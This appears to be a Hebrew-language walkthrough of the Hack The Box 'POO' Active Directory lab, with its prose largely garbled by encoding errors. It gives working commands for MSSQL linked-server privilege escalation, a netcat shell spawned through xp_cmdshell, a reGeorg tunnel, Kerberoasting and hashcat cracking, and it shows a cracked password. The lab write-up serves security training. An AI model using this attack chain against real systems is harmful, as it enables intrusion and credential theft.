ืืืืืจ ืื ื ื ืชื ืืช ืืืขืืจ ืฉื ืื ืจืง ืืืื ื, ืืื ืืื ื ืืขืืื ืฉืืื ืืืืชืจ
ืืคื ืฉืฆืืื ืืชืืืืจ, POO ื ืืขื ืืืืืง ืืืืื ืืืืช ืืื ืฉืืื ืืืชืงืคืืช ืืกืืืืช Active Directory ืงืื ื. ืืืืจื ืืื ืืกืื ืืืจื ืืืื, ืืืกืืื ืืจืฉืืืช, ืืืกืืคื ืฉื ืืืจ ืืกืื ืืช ืื ืืืืืืื ืขื ืืื ืืืกืืฃ 5 ืืืืื ืืชืืืื.
ืืืืืืจ ืืืขืืื ืืื ืืืืฆืขืืช VPN. ืืืืืฅ ืื ืืืชืืืจ ืืืืฉื ืขืืื ืื ืืืจื ืฉืืฉ ืื ื ืชืื ืื ืืฉืืืื ืขืืืจืื, ืืืืืื ืฉืืชื ื ืื ืกืื ืืจืฉืช ืคืจืืืช ืขื ืื ืฉืื ืฉืืืืขืื ืืฉืื ืขื ืืืืืช ืืืืข ๐
ืืืืข ืืจืืื ื
ืืื ืืขืืืจ ืื ืืืืฉืืจ ืืขืืืื ืืืืืจืื ืืืฉืื, ืชืืื ืืช ืืืืืข ืืืจ, ืืฆืจืชื
ืื ืืืืืข ื ืืชื ืืืืจืืช ืืื ืืืืืช ืืืื. ืืืืจ ืืกืื ืื ืืื ื ื ืืฉื ืืืืจืืืช ืืื ื ืืง ืฉืืืืจื ืืืืฉ ืืชืืฆืื ืืฉืืืืฉ ืืืืข ืืืฉืืืืช ืฉืืืฉืื ืืชืืฆืื ืืขืืื ืืืกืื ืื.
ืืืื
ืืฉืืง ืืงืฆื ืืื ืืืจืื ืืฉืชื ืืืื ืืช ืืืืื 5 ืืืืื.
ื ืืชื ืื ืชืืืืจ ืืืชืืืช ืฉื ืืืืจื ืืืืื.
ืืืื ื ืชืืื!
ืืื ืจืืงืื
ืืืืฉื ืืื ืืฉ ืืชืืืช IP ืฉื 10.13.38.11 ืฉืืืชื ืื ื ืืืกืืฃ ื-/etc/hosts.
10.13.38.11 poo.htb
ืืฉืื ืืจืืฉืื ืืื ืกืจืืงืช ืืฆืืืืช ืคืชืืืืช. ืืืืืื ืฉืืืงื ืืจืื ืืื ืืกืจืืง ืืช ืื ืืคืืจืืื ืขื nmap, ืื ื ืืขืฉื ืืช ืื ืงืืื ืื ืขื masscan. ืื ื ืกืืจืงืื ืืช ืื ืืฆืืืืช ื-TCP ืื-UDP ืืืืฉืง tun0 ื-500 ืขืืืืื ืืฉื ืืื.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
ืืขืช, ืืื ืืงืื ืืืืข ืืคืืจื ืืืชืจ ืขื ืืฉืืจืืชืื ืืคืืขืืื ืขื ืืคืืจืืื, ืืืื ื ืจืืฅ ืกืจืืงื ืขื ืืคืฉืจืืช -A.
nmap -A poo.htb -p80,1433
ืืคืืื, ืืฉ ืื ื ืฉืืจืืชื IIS ื-MSSQL. ืืืงืจื ืื, ื ืืื ืืช ืฉื ื-DNS ืืืืืชื ืฉื ืืืืืืื ืืืืืฉื. ืืฉืจืช ืืืื ืืจื ื, ืืงืื ืืช ืคื ืื ื ืขืืื ืืืืช ืฉื IIS.
ืืืื ื ืขืืืจ ืขื ืืืืจืืืื. ืื ื ืืฉืชืืฉ ืืืืืืกืืจ ืืฉืืื ืื. ืืคืจืืืจืื ืื ื ืืฆืืื ืื ืืช ืืกืคืจ ืืืจืืื 128 (-t), URL (-u), ืืืืื (-w) ืืืจืืืืช ืฉืืขื ืืื ืื ืืืชื ื (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
ืืคืืื, ืืฉ ืื ื ืืืืืช HTTP ืขืืืจ ืกืคืจืืืช /admin, ืืื ืื ืืช ืงืืืฅ ืืืืกืื ืฉื ืฉืืจืืช ืฉืืืื ืืขืืืื DS_Store ืืืื. DS_Store ืื ืงืืฆืื ืืืืืกื ืื ืืืืจืืช ืืฉืชืืฉ ืขืืืจ ืชืืงืื, ืืืื ืจืฉืืืช ืงืืฆืื, ืืืงืื ืืืืงืื ืื, ืชืืื ืช ืจืงืข ืฉื ืืืจื. ืงืืืฅ ืืื ืขืืื ืืืืืข ืืกืคืจืืืช ืฉืจืช ืืืื ืืจื ื ืฉื ืืคืชืื ืืชืจืื. ืื, ืื ื ืืงืืืื ืืืืข ืขื ืชืืื ืืืืจืื. ืืฉืืื ืื ืืชื ืืืื ืืืฉืชืืฉ
python3 dsstore_crawler.py -i http://poo.htb/
ืื ื ืืงืืืื ืืช ืชืืื ืืืืจืื. ืืืืจ ืืืขื ืืื ืืืืชืจ ืืื ืืื ืกืคืจืืืช /dev, ืืื ื ืื ื ืืืืืื ืืจืืืช ืืช ืืืงืืจืืช ืืงืืฆื db ืืฉื ื ืขื ืคืื. ืืื ืื ืื ื ืืืืืื ืืืฉืชืืฉ ื-6 ืืชืืืื ืืจืืฉืื ืื ืฉื ืฉืืืช ืืงืืฆืื ืืืกืคืจืืืช ืื ืืฉืืจืืช ืคืืืข ื- IIS ShortName. ืืชื ืืืื ืืืืืง ืืช ืืคืืืขืืช ืืื ืืืืฆืขืืช
ืืื ืื ื ืืืฆืืื ืงืืืฅ ืืงืกื ืืื ืฉืืชืืื ื-"poo_co". ืื ืืืขืชื ืื ืืขืฉืืช ืืืื, ืคืฉืื ืืืจืชื ืืืืืื ืืืืจืืืื ืืช ืื ืืืืืื ืฉืืชืืืืืช ื-"co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
ืืชืืืจื ืขื wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
ืืืืฆืื ืืช ืืืืื ืื ืืื ื! ืื ื ืืกืชืืืื ืขื ืืงืืืฅ ืืื, ืฉืืืจืื ืืช ืืืืฉืืจืื (ืื ืืฉืคืื ืืคื ืืคืจืืืจ DBNAME, ืื ื-MSSQL).
ืื ืื ื ืืืกืจืื ืืช ืืืื, ืืืชืงืืืื ื-20%.
ืื ืืื
ืื ืื ื ืืชืืืจืื ื-MSSQL, ืื ื ืืฉืชืืฉ ื-DBeaver.
ืื ืื ื ืื ืืืฆืืื ืืฉืื ืืขื ืืื ืืืกื ืื ืชืื ืื ืืื, ืืืื ื ืืฆืืจ ืขืืจื SQL ืื ืืืืง ืืื ืืืฉืชืืฉืื.
SELECT name FROM master..syslogins;
ืืฉ ืื ื ืฉื ื ืืฉืชืืฉืื. ืืืื ื ืืืืง ืืช ืืืจืฉืืืช ืฉืื ื.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
ืืคืืื, ืืื ืืจืฉืืืช. ืืื ื ืจืื ืืช ืืฉืจืชืื ืืืงืืฉืจืื, ืืชืืชื ืขื ืืืื ืืงื ืืื ืืคืืจืื
SELECT * FROM master..sysservers;
ืื ืื ืื ื ืืืฆืืื SQL Server ืืืจ. ืืืื ื ืืืืง ืืช ืืืฆืืข ืืคืงืืืืช ืืฉืจืช ืื ืืืืฆืขืืช openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
ืืื ืื ื ืืคืืื ืืืืืื ืืื ืืช ืขืฅ ืฉืืืืชืืช.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
ืืขืืืื ืืื ืฉืืืฉืจ ืื ื ืืืืฉืื ืืงืฉื ืืฉืจืช ืืงืืฉืจ, ืืืงืฉื ืืืืฆืขืช ืืืงืฉืจ ืฉื ืืฉืชืืฉ ืืืจ! ืืื ื ืจืื ืืืื ืืงืฉืจ ืืฉืชืืฉ ืื ืื ื ืืจืืฆืื ืืฉืจืช ืืืงืืฉืจ.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
ืืขืืฉืื ื ืจืื ืืืืื ืืงืฉืจ ืืืืฆืขืช ืืืงืฉื ืืืฉืจืช ืืืงืืฉืจ ืืฉืื ื!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
ืืคืืื, ืืื ืืงืฉืจ DBO ืฉืืืื ืืงืื ืืช ืื ืืืจืฉืืืช. ืืืื ื ืืืืง ืืช ืืืจืฉืืืช ืืืงืจื ืฉื ืืงืฉื ืืฉืจืช ืืงืืฉืจ.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
ืืคื ืฉืืชื ืืืื ืืจืืืช, ืืฉ ืื ื ืืช ืื ืืืจืฉืืืช! ืืืื ื ืืฆืืจ ืืช ืืื ืื ืฉืื ื ืืื. ืืื ืื ืื ื ืืชื ืื ืืื ืืขืืืจ openquery, ืืืื ื ืขืฉื ืืช ืื ืืจื EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
ืืขืืฉืื ืื ืื ื ืืชืืืจืื ืขื ืืืืฉืืจืื ืฉื ืืืฉืชืืฉ ืืืืฉ, ืฆืคื ืืืกื ืื ืชืื ืื ืืืืฉ ืฉื ืืืืืื.
ืื ืื ื ืืืกืจืื ืืช ืืืื ืืื ืืืืืืื ืจืืืง ืืืชืจ.
ืืื ืืืจื ืืืืืจ
ืืื ื ืฉืื ืืช ืืืขืืคืช ืืืืฆืขืืช MSSQL, ืื ื ืืฉืชืืฉ ื-mssqlclient ืืืืืืช impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
ืื ืื ื ืฆืจืืืื ืืืฉืื ืกืืกืืืืช, ืืืืืจ ืืจืืฉืื ืฉืืืจ ืคืืฉื ื ืืื ืืืชืจ. ืืคืืื, ืื ื ืืงืืงืื ืืชืฆืืจืช ืฉืจืช ืืื ืืจื ื (ืื ืืคืฉืจ ืืืจืืง ืืขืืคืช ื ืืื, ืืื ืื ืจืื ืืืืช ืืืฉ ืขืืืืช).
ืืื ืืืืฉื ื ืืืชื. ืืืจืืช ืฉืื ืื ื ืืืืืื ืืงืจืื ืืช ืืงืืืฅ ื-MSSQL, ืื ืื ื ืจืง ืฆืจืืืื ืืืขืช ืืืื ืฉืคืืช ืชืื ืืช ืืืืืจืืช. ืืืกืคืจืืืช MSSQL ืื ืื ื ืืืืื ืฉืืฉ Python.
ืื ืืื ืืขืื ืืงืจืื ืืช ืืงืืืฅ web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
ืขื ืืืืฉืืจืื ืฉื ืืฆืื, ืขืืืจ ืื /admin ืืืจืื ืืช ืืืื.
ืืื ืืจืืกืช ืจืื
ืืืขืฉื, ืืฉื ื ืืื ืื ื ืืืืช ืืฉืืืืฉ ืืืืืช ืืฉ, ืื ืืืกืชืืืืช ืขื ืืืืจืืช ืืจืฉืช, ืื ื ืืืืื ืื ืื ื ืขืฉื ืฉืืืืฉ ืื ืืคืจืืืืงืื IPv6!
ืืืื ื ืืกืืฃ ืืช ืืืชืืืช ืืื ื-/etc/hosts.
dead:babe::1001 poo6.htb
ืืืื ื ืกืจืืง ืืช ืืืืจื ืฉืื, ืืื ืืคืขื ืืืืฆืขืืช IPv6.
ืืฉืืจืืช WinRM ืืืื ืืืืฆืขืืช IPv6. ืืืื ื ืชืืืจ ืขื ืืืืฉืืจืื ืฉื ืืฆืื.
ืืฉ ืืื ืขื โโืฉืืืื ืืขืืืื, ืืกืืจ ืืืชื.
ืืื P00ned
ืืืืจ ืกืืืจ ืขื ืืืืจื ืขื
setspn.exe -T intranet.poo -Q */*
ืืื ื ืืฆืข ืืช ืืคืงืืื ืืืืฆืขืืช MSSQL.
ืืืจื ืื, ืื ื ืืงืืืื ืืช ื-SPN ืฉื ืืืฉืชืืฉืื p00_hr ื-p00_adm, ืื ืฉืืืืจ ืฉืื ืคืืืขืื ืืืชืงืคื ืืืื Kerberoasting. ืืงืืฆืืจ, ืื ืื ื ืืืืืื ืืงืื ืืช ื-hash ืฉื ืืกืืกืืืืช ืฉืืื.
ืจืืฉืืช ืขืืื ืืงืื ืืขืืคืช ืืฆืืื ืืืขื ืืฉืชืืฉ MSSQL. ืืื ืืืืืื ืฉืื ื ืืืืืืื ืืืืฉื, ืืฉ ืื ื ืงืฉืจ ืขื ืืืืจื ืจืง ืืจื ืืฆืืืืช 80 ื-1433. ืืื ืืคืฉืจ ืืืขืืืจ ืชื ืืขื ืืจื ื ืื 80! ืืฉืืื ืื ืื ืื ื ืืฉืชืืฉืื
ืื ืืืฉืจ ืื ื ืื ืกืื ืืืฉืช ืืืื, ืื ื ืืงืืืื ืฉืืืื 404. ืืฉืืขืืช ืืืืจ ืืื ืฉืงืืฆื *.aspx ืืื ื ืืืืฆืขืื. ืืื ืืืคืขืื ืงืืฆืื ืขื ืืจืืืืช ืืื, ืืชืงื ืืช ASP.NET 4.5 ืืืืคื ืืื.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
ืืขืืฉืื, ืืืฉืจ ื ืืืฉืื ืtunnel.aspx, ืื ื ืืงืืืื ืืช ืืชืฉืืื ืฉืืื ืืืื ืืคืขืืื.
ืืืื ื ืชืืื ืืช ืืืง ืืืงืื ืฉื ืืืคืืืงืฆืื, ืฉืืขืืืจ ืชืขืืืจื. ื ืขืืืจ ืืช ืื ืืชืขืืืจื ืืืฆืืื 5432 ืืฉืจืช.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
ืืื ืื ื ืืฉืชืืฉืื ื-proxychains ืืื ืืฉืืื ืืช ืืชืขืืืจื ืฉื ืื ืืืฉืื ืืจื ื-proxy ืฉืื ื. ืืืื ื ืืกืืฃ ืืช ื-proxy ืืื ืืงืืืฅ ืืชืฆืืจื /etc/proxychains.conf.
ืืขืช ื ืขืื ืืช ืืชืืื ืืช ืืฉืจืช
ืืขืช, ืืืืฆืขืืช MSSQL, ืื ื ืืฉืืงืื ืืช ืืืืืื.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
ืืื ืื ื ืืชืืืจืื ืืจื ื-proxy ืฉืื ื.
proxychains rlwrap nc poo.htb 4321
ืืืืื ื ืฉืื ืืช ืืืืืืืื.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
ืืืืจ ืืื, ืขืืื ืืืืืจ ืขื ืืืืืืืื ืืืื. ืืืืืื ืฉืื ืืื ื-rockyou ืืืืื ื ืชืื ื ืกืืกืืืืช, ืืฉืชืืฉืชื ืืื ืืืืื ื ืืกืืกืืืืช ืฉืกืืคืงื ื-Seclists. ืืกืคืืจื ืื ื ืืฉืชืืฉืื ื-hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
ืืื ืื ื ืืืฆืืื ืืช ืฉืชื ืืกืืกืืืืช, ืืจืืฉืื ื ืืืืืื dutch_passwordlist.txt, ืืืฉื ืืื ื-Keyboard-Combinations.txt.
ืื ืืฉ ืื ื ืฉืืืฉื ืืฉืชืืฉืื, ืื ืื ื ืืืืืื ืืืงืจ ืืชืืื. ืืื ื ืืื ืงืืื ืืช ืืชืืืชื.
ืืฆืืื, ืืืื ื ืืช ืืชืืืช ื-IP ืฉื ืืงืจ ืืชืืื. ืืืื ืืืืืช ืืช ืื ืืืฉืชืืฉืื ืฉื ืืืืืืื, ืืื ืื ืื ืืื ืืื ืื ืื. ืืื ืืืืจืื ืืช ืืกืงืจืืคื ืืื ืืงืื ืืืืข PowerView.ps1. ืืืืจ ืืื ื ืชืืืจ ืืืืฆืขืืช evil-winrm, ืื ืฆืืื ืืช ืืกืคืจืืื ืขื ืืกืงืจืืคื ืืคืจืืืจ -s. ืืื ืคืฉืื ืืขื ืืช ืืกืงืจืืคื ืฉื PowerView.
ืืขืช ืืฉ ืื ื ืืืฉื ืืื ืืคืื ืงืฆืืืช ืฉืื. ืืืฉืชืืฉ p00_adm ื ืจืื ืืื ืืฉืชืืฉ ืืืืืก, ืื ื ืขืืื ืืืงืฉืจ ืฉืื. ืืืื ื ืืฆืืจ ืืืืืืงื PSCredential ืขืืืจ ืืฉืชืืฉ ืื.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
ืืขืช ืื ืคืงืืืืช Powershell ืฉืืื ืื ื ืืฆืืื ืื Creds ืืืืฆืขื ืืืขื p00_adm. ืืืื ื ืฆืื ืจืฉืืื ืฉื ืืฉืชืืฉืื ืืืช ืืชืืื ื AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
ืืื, ืืืฉืชืืฉ ืฉืื ื ืืื ืืืืช ืืืืืก. ืืื ื ืจืื ืืืืื ืงืืืฆืืช ืืื ืืฉืชืืื.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
ืืืกืืฃ ืื ื ืืืฉืจืื ืฉืืืฉืชืืฉ ืืื ืื ืื ืืืืืื. ืื ื ืืชื ืื ืืช ืืืืืช ืืืืื ืก ืืจืืืง ืืืงืจ ืืชืืื. ืืืื ื ื ืกื ืืืืื ืก ืขื WinRM ืืืืฆืขืืช ืืื ืืจื ืฉืื ื. ืืืืชื ืืืืืื ืืืฉืืืืืช ืฉืืืฆืื reGeorg ืืขืช ืืฉืืืืฉ ื-evil-winrm.
ืืื ืื ืื ื ืืฉืชืืฉืื ืืืื ืืืจ, ืงื ืืืชืจ,
ืื ืื ื ืื ืกืื ืืืชืืืจ, ืืื ืื ื ืืืขืจืืช.
ืืื ืืื ืืื. ืืืืจ ืืื ืืกืชืื ืขื ืืืฉืชืืฉ ืืืืืง ืืช ืฉืืืื ืืขืืืื.
ื-mr3ks ืื ื ืืืฆืืื ืืช ืืืื ืืืืขืืื ืืืฉืืื ื-100%.
ืื ืืื. ืืืฉืื, ืืืืื ืื ืืืืชื ืืฉืื ืืืฉ ืืืืืืจ ืืื ืืืื ืืื ืืื ืฉืืืืฉื ืขืืืจืื.
ืืชื ืืืื ืืืฆืืจืฃ ืืืื ื ื
ืืงืืจ: www.habr.com